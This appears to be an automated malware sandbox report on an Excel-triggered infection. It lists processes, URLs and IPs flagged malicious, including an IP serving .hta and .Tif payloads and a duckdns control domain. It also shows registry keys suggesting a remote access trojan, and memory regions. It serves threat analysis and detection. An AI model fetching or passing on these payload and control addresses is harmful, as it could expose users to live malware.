C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp" "c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB635.tmp" "c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP"
There are 12 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://38.240.44.9/590/RRSRRD.txt
38.240.44.9
 malicious
ugnrv.duckdns.org
malicious
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
207.241.227.242
 malicious
http://38.240.44.9/590/nicefeaturesworkinggreat.Tif
38.240.44.9
 malicious
http://38.240.44.9/590/un/verynicepersonupdation.hta
38.240.44.9
 malicious
http://www.imvu.comr
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
unknown
https://deff.nelreports.net/api/report?cat=msn
unknown
http://www.imvu.com/PK
unknown
http://cache.btrll.com/default/Pix-1x1.gif
unknown
https://www.google.com
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htag
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htab
unknown
http://geoplugin.net/json.gp/C
unknown
http://o.aolcdn.com/ads/adswrappermsni.js
unknown
http://www.msn.com/?ocid=iehp
unknown
https://nuget.org/nuget.exe
unknown
http://static.chartbeat.com/js/chartbeat.js
unknown
http://www.msn.com/de-de/?ocid=iehp
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htaw
unknown
http://www.nirsoft.net/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htaz
unknown
http://go.cr
unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htaF
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
unknown
http://38.240.44.9/a
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htaJ
unknown
http://www.imvu.com
unknown
https://contoso.com/Icon
unknown
http://38.240.44.9
unknown
https://wrath.me/DeSHzcBU
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htaQ
unknown
https://contextual.media.net/
unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
unknown
https://ia600102.us.archive.org
unknown
http://www.msn.com/
unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549
unknown
https://wrath.me/DeSHzcon.htaJ
unknown
http://go.microsoft.c
unknown
https://wrath.me/YZ
unknown
https://www.google.com/accounts/servicelogin
unknown
http://38.240.44.9/590/un/verynicepersonupdation.hta4
unknown
http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
unknown
https://policies.yahoo.com/w3c/p3p.xml
unknown
http://38.240.44.9/590/un/verynicepersonupdation.hta?
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://www.msn.com/advertisement.ad.js
unknown
http://38.240.44.9/590/nicefeaturesworkinggreat.TifI
unknown
http://b.scorecardresearch.com/beacon.js
unknown
https://wrath.me/F
unknown
http://acdn.adnxs.com/ast/ast.js
unknown
http://38.240.44.9/#
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
http://38.240.44.9/590/nicefeatu
unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
unknown
http://38.240.44.9/590/nicefeaturesworkinggreat.Tifp
unknown
https://wrath.me/DeSHzc
188.114.96.3
http://go.micros
unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
unknown
http://38.240.44.9/
unknown
https://wrath.me/
unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js
unknown
https://contoso.com/
unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033
unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
unknown
https://login.yahoo.com/config/login
unknown
http://ocsp.entrust.net0D
unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
unknown
http://38.240.44.9/590/un/verynicepersonupdation.htahttp://38.240.44.9/590/un/verynicepersonupdation
unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
unknown
http://nuget.org/NuGet.exe
unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey
unknown
https://wrath.me/DeSHzcon.htaVU
unknown
https://wrath.me/lZ
unknown
http://crl.entrust.net/server1.crl0
unknown
https://contextual.media.net/8/nrrV73987.js
unknown
http://crl.entrust.n
unknown
https://wrath.me/DeSHzcFU
unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://cdn.at.atwola.com/_media/uac/msn.html
unknown
http://38.240.44.9/590/nicefeaturesworkinggreat.TifC:
unknown
http://www.nirsoft.netp
unknown
https://wrath.me/_
unknown
https://secure.comodo.com/CPS0
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ugnrv.duckdns.org
192.3.101.184
 malicious
ia600102.us.archive.org
207.241.227.242
 malicious
wrath.me
188.114.96.3
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
38.240.44.9
unknown
United States
malicious
207.241.227.242
ia600102.us.archive.org
United States
malicious
192.3.101.184
ugnrv.duckdns.org
United States
malicious
188.114.97.3
unknown
European Union
188.114.96.3
wrath.me
European Union
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
{10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
2060
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1036
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\2C938
2C938
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
x;0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35F11
35F11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\36400
36400
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3699C
3699C
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\36400
36400
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Rmc-0BYJUE
exepath
HKEY_CURRENT_USER\Software\Rmc-0BYJUE
licence
HKEY_CURRENT_USER\Software\Rmc-0BYJUE
time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 84 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
8B1000
heap
page read and write
 malicious
1291E000
trusted library allocation
page read and write
 malicious
90E000
heap
page read and write
 malicious
7F1000
heap
page read and write
 malicious
895000
heap
page read and write
 malicious
901000
heap
page read and write
 malicious
400000
remote allocation
page execute and read and write
 malicious
D4E000
stack
page read and write
 malicious
385A000
heap
page read and write
384C000
heap
page read and write
123AF000
trusted library allocation
page read and write
4A9000
heap
page read and write
1D40000
direct allocation
page read and write
125BD000
trusted library allocation
page read and write
DE000
heap
page read and write
1C10B000
heap
page read and write
3626000
heap
page read and write
1BF9B000
heap
page read and write
32A0000
trusted library allocation
page read and write
37C000
heap
page read and write
99D000
heap
page read and write
2CE000
heap
page read and write
322000
heap
page read and write
1C30B000
heap
page read and write
3E3B000
trusted library allocation
page read and write
462E000
heap
page read and write
4632000
heap
page read and write
B9000
heap
page read and write
7FE89BC4000
trusted library allocation
page read and write
1C05E000
stack
page read and write
7FE89A30000
trusted library allocation
page execute and read and write
7FE89863000
trusted library allocation
page read and write
264000
heap
page read and write
4680000
heap
page read and write
426000
heap
page read and write
7FE899F2000
trusted library allocation
page read and write
2C70000
remote allocation
page read and write
4541000
heap
page read and write
25A2000
trusted library allocation
page read and write
1A47C000
stack
page read and write
2090000
heap
page execute and read and write
1B086000
heap
page read and write
4680000
heap
page read and write
28EF000
trusted library allocation
page read and write
4AB000
heap
page read and write
4AE000
heap
page read and write
1CA6000
heap
page read and write
25A0000
trusted library allocation
page execute read
10000
heap
page read and write
2F0000
trusted library allocation
page read and write
2F7000
heap
page read and write
1B36E000
stack
page read and write
7FE8987B000
trusted library allocation
page read and write
463C000
heap
page read and write
4651000
heap
page read and write
296000
heap
page read and write
B30000
heap
page read and write
2C8D000
trusted library allocation
page read and write
7FE89B70000
trusted library allocation
page read and write
407000
heap
page read and write
488000
heap
page read and write
1AA0F000
stack
page read and write
3D7000
heap
page read and write
310000
trusted library allocation
page read and write
474000
heap
page read and write
7FE89960000
trusted library allocation
page execute and read and write
10000
heap
page read and write
463C000
heap
page read and write
B0000
heap
page read and write
1AE2F000
stack
page read and write
36EE000
heap
page read and write
3497000
trusted library allocation
page read and write
2C92000
trusted library allocation
page read and write
25B000
heap
page read and write
402E000
stack
page read and write
40B000
heap
page read and write
3845000
heap
page read and write
4611000
heap
page read and write
1B0F0000
heap
page read and write
32A6000
trusted library allocation
page read and write
1C44E000
stack
page read and write
1DB0000
direct allocation
page read and write
3794000
heap
page read and write
296000
heap
page read and write
332000
heap
page read and write
35B000
heap
page read and write
300D000
trusted library allocation
page read and write
7FE89910000
trusted library allocation
page execute and read and write
467B000
heap
page read and write
8E5000
heap
page read and write
25F0000
heap
page read and write
921000
heap
page read and write
3A00000
trusted library allocation
page read and write
2A10000
heap
page read and write
3B10000
trusted library allocation
page read and write
337000
heap
page read and write
1D0000
heap
page read and write
3D2000
heap
page read and write
39F9000
trusted library allocation
page read and write
1AB66000
heap
page read and write
7FE89BB0000
trusted library allocation
page read and write
3856000
heap
page read and write
364000
heap
page read and write
4A3B000
heap
page read and write
3D90000
trusted library allocation
page read and write
1D80000
direct allocation
page read and write
7FE89916000
trusted library allocation
page read and write
10000
heap
page read and write
32AA000
trusted library allocation
page read and write
1CA3000
direct allocation
page read and write
3C0000
heap
page read and write
421000
heap
page read and write
3E3B000
trusted library allocation
page read and write
2BD000
heap
page read and write
1A92F000
stack
page read and write
7FE89B55000
trusted library allocation
page read and write
7FE89863000
trusted library allocation
page execute and read and write
1CBD000
direct allocation
page read and write
2C94000
trusted library allocation
page read and write
24A000
heap
page read and write
20000
heap
page read and write
3670000
heap
page read and write
235F000
stack
page read and write
4E0000
heap
page read and write
1B56E000
stack
page read and write
1E60000
heap
page read and write
7FE89A10000
trusted library allocation
page execute and read and write
7FE89AE0000
trusted library allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
28C000
heap
page read and write
3799000
heap
page read and write
3A05000
trusted library allocation
page read and write
3A6000
heap
page read and write
36E8000
heap
page read and write
371000
heap
page read and write
1AC6A000
heap
page read and write
1B184000
heap
page read and write
479000
heap
page read and write
40CF000
stack
page read and write
3F3000
heap
page read and write
10000
heap
page read and write
523000
heap
page read and write
1AB89000
heap
page read and write
7FE8992C000
trusted library allocation
page execute and read and write
7FE89946000
trusted library allocation
page execute and read and write
1F0000
trusted library allocation
page read and write
1BF0D000
stack
page read and write
2550000
heap
page read and write
7FE89A70000
trusted library allocation
page read and write
43DB000
heap
page read and write
32B0000
heap
page read and write
4A7000
heap
page read and write
12571000
trusted library allocation
page read and write
34E000
heap
page read and write
230B000
trusted library allocation
page read and write
235A000
trusted library allocation
page read and write
328000
heap
page read and write
4B3000
direct allocation
page read and write
4538000
heap
page read and write
3BBD000
stack
page read and write
D40000
heap
page read and write
45C000
heap
page read and write
716000
heap
page read and write
3B40000
trusted library allocation
page read and write
610000
heap
page read and write
1C175000
heap
page read and write
12CD1000
trusted library allocation
page read and write
367000
heap
page read and write
424000
heap
page read and write
7FE89AD0000
trusted library allocation
page read and write
4CB000
direct allocation
page read and write
3A00000
trusted library allocation
page read and write
31B000
stack
page read and write
4AE000
heap
page read and write
40B000
heap
page read and write
1E64000
heap
page read and write
10000
heap
page read and write
35C0000
heap
page read and write
1C8AC000
stack
page read and write
12A6E000
trusted library allocation
page read and write
51A000
heap
page read and write
7FE89936000
trusted library allocation
page execute and read and write
10000
heap
page read and write
4634000
heap
page read and write
2040000
heap
page read and write
1A51E000
heap
page execute and read and write
4CD000
direct allocation
page read and write
4BE2000
heap
page read and write
7FE89B70000
trusted library allocation
page read and write
2C5A000
trusted library allocation
page read and write
1AC4B000
heap
page read and write
2EAB000
stack
page read and write
14B000
stack
page read and write
3497000
trusted library allocation
page read and write
2898000
trusted library allocation
page read and write
7FE89A90000
trusted library allocation
page read and write
408000
heap
page read and write
47C5000
heap
page read and write
461D000
heap
page read and write
1C13C000
stack
page read and write
10000
heap
page read and write
49E0000
heap
page read and write
280000
heap
page read and write
A3C000
stack
page read and write
380000
heap
page read and write
1D2A000
stack
page read and write
31E000
heap
page read and write
47E000
heap
page read and write
36DE000
heap
page read and write
235E000
trusted library allocation
page read and write
3E3B000
trusted library allocation
page read and write
3858000
heap
page read and write
37B000
heap
page read and write
1DE0000
direct allocation
page read and write
1AD2F000
stack
page read and write
10000
heap
page read and write
3DBE000
stack
page read and write
2130000
trusted library allocation
page read and write
313C000
stack
page read and write
7FE89BD0000
trusted library allocation
page read and write
46FF000
heap
page read and write
3A8000
heap
page read and write
2372000
trusted library allocation
page read and write
2C85000
trusted library allocation
page read and write
4BEA000
heap
page read and write
34C000
heap
page read and write
2F5000
heap
page read and write
22E4000
trusted library allocation
page read and write
329E000
trusted library allocation
page read and write
122D1000
trusted library allocation
page read and write
40B000
heap
page read and write
29FF000
stack
page read and write
473A000
heap
page read and write
1C359000
heap
page read and write
385D000
heap
page read and write
36C000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
AC0000
heap
page read and write
7FE89A44000
trusted library allocation
page read and write
7FE89B10000
trusted library allocation
page read and write
5170000
heap
page read and write
2ADF000
trusted library allocation
page read and write
7FE89A2C000
trusted library allocation
page read and write
36F0000
heap
page read and write
9F0000
heap
page read and write
2925000
trusted library allocation
page read and write
4545000
heap
page read and write
480B000
heap
page read and write
4420000
trusted library allocation
page read and write
1B006000
heap
page read and write
580000
heap
page read and write
1B0F8000
heap
page read and write
384E000
heap
page read and write
488000
heap
page read and write
408000
heap
page read and write
3626000
heap
page read and write
39F000
heap
page read and write
4357000
heap
page read and write
1A8D0000
heap
page read and write
129FE000
trusted library allocation
page read and write
B40000
heap
page read and write
473A000
heap
page read and write
1A3A0000
heap
page read and write
262B000
heap
page read and write
7FE89956000
trusted library allocation
page execute and read and write
3CF000
heap
page read and write
39AC000
heap
page read and write
3497000
trusted library allocation
page read and write
25F5000
heap
page read and write
2F3000
heap
page read and write
1CEF000
stack
page read and write
24C000
heap
page read and write
1C60000
direct allocation
page read and write
25C7000
trusted library allocation
page read and write
39CC000
stack
page read and write
1B050000
heap
page read and write
7FE89906000
trusted library allocation
page read and write
1DE3000
direct allocation
page read and write
379F000
heap
page read and write
7FE89930000
trusted library allocation
page execute and read and write
4BDC000
heap
page read and write
48D000
heap
page read and write
14B09000
trusted library allocation
page read and write
1B4000
heap
page read and write
50A000
heap
page read and write
38D9000
heap
page read and write
1C205000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
2B8000
heap
page read and write
3497000
trusted library allocation
page read and write
1C60000
heap
page read and write
1B46E000
stack
page read and write
46C4000
heap
page read and write
30E000
heap
page read and write
3701000
heap
page read and write
4BE8000
heap
page read and write
273B000
heap
page read and write
39F9000
trusted library allocation
page read and write
7FE89B50000
trusted library allocation
page read and write
1A54F000
stack
page read and write
4A5000
heap
page read and write
7FE89A10000
trusted library allocation
page execute and read and write
3497000
trusted library allocation
page read and write
3BF000
heap
page read and write
370000
heap
page read and write
47AB000
heap
page read and write
1C353000
heap
page read and write
4549000
heap
page read and write
7FE89A40000
trusted library allocation
page execute and read and write
510000
direct allocation
page read and write
7FE89910000
trusted library allocation
page execute and read and write
373000
heap
page read and write
386F000
heap
page read and write
13FCD000
trusted library allocation
page read and write
1A2000
heap
page read and write
452E000
heap
page read and write
1C180000
heap
page read and write
1C315000
heap
page read and write
E2000
stack
page read and write
344000
heap
page read and write
306000
heap
page read and write
4B7000
direct allocation
page read and write
4BE2000
heap
page read and write
4BDC000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
7FE89A10000
trusted library allocation
page execute and read and write
3D2000
heap
page read and write
39F000
heap
page read and write
400000
system
page execute and read and write
4AB000
heap
page read and write
4E4000
heap
page read and write
3012000
trusted library allocation
page read and write
1C313000
heap
page read and write
244F000
trusted library allocation
page read and write
1E30000
heap
page read and write
7FE89A0C000
trusted library allocation
page read and write
3E3B000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
2EB0000
heap
page read and write
45F000
heap
page read and write
1A4E8000
heap
page execute and read and write
1C13C000
heap
page read and write
3624000
heap
page read and write
3B50000
trusted library allocation
page read and write
1AFEF000
stack
page read and write
23B000
stack
page read and write
36EE000
heap
page read and write
7FE89C1C000
trusted library allocation
page read and write
37D000
heap
page read and write
2E8000
heap
page read and write
3850000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
20000
heap
page read and write
44C0000
heap
page read and write
4613000
heap
page read and write
2C92000
trusted library allocation
page read and write
37C000
heap
page read and write
1A9F8000
stack
page read and write
2D2000
heap
page read and write
2705000
heap
page read and write
382000
heap
page read and write
4BEA000
heap
page read and write
22A000
heap
page read and write
36E0000
heap
page read and write
1B5AF000
stack
page read and write
1FAF000
stack
page read and write
359000
heap
page read and write
3DF000
heap
page read and write
1AB51000
heap
page read and write
7FE89BC0000
trusted library allocation
page read and write
2C10000
heap
page read and write
1C33C000
heap
page read and write
2C92000
trusted library allocation
page read and write
4630000
heap
page read and write
388000
heap
page read and write
25D000
heap
page read and write
1B290000
heap
page read and write
1FF000
trusted library allocation
page read and write
3E3B000
trusted library allocation
page read and write
454A000
heap
page read and write
B2E000
stack
page read and write
7FE89A44000
trusted library allocation
page read and write
3497000
trusted library allocation
page read and write
1AD26000
heap
page read and write
1A68E000
heap
page execute and read and write
364E000
heap
page read and write
4BE9000
heap
page read and write
454F000
heap
page read and write
380000
heap
page read and write
40B000
heap
page read and write
7FE89863000
trusted library allocation
page read and write
7FE89853000
trusted library allocation
page read and write
1ABE2000
heap
page read and write
369B000
heap
page read and write
3497000
trusted library allocation
page read and write
3A05000
trusted library allocation
page read and write
470000
heap
page read and write
288000
heap
page read and write
7FE89BE1000
trusted library allocation
page read and write
1A7E8000
heap
page execute and read and write
7FE89920000
trusted library allocation
page execute and read and write
259000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
2C92000
trusted library allocation
page read and write
386F000
heap
page read and write
347000
heap
page read and write
4CF000
heap
page read and write
32F000
heap
page read and write
2A21000
heap
page read and write
1DA4000
heap
page read and write
3A05000
trusted library allocation
page read and write
36B0000
heap
page read and write
7FE89AB0000
trusted library allocation
page read and write
2B0000
trusted library allocation
page read and write
1A752000
heap
page read and write
452E000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
358000
heap
page read and write
7FE89860000
trusted library allocation
page read and write
7FE89BA0000
trusted library allocation
page read and write
1C3FD000
stack
page read and write
1DAF000
stack
page read and write
3935000
trusted library allocation
page read and write
7FE89A00000
trusted library allocation
page read and write
1DA0000
direct allocation
page read and write
3005000
trusted library allocation
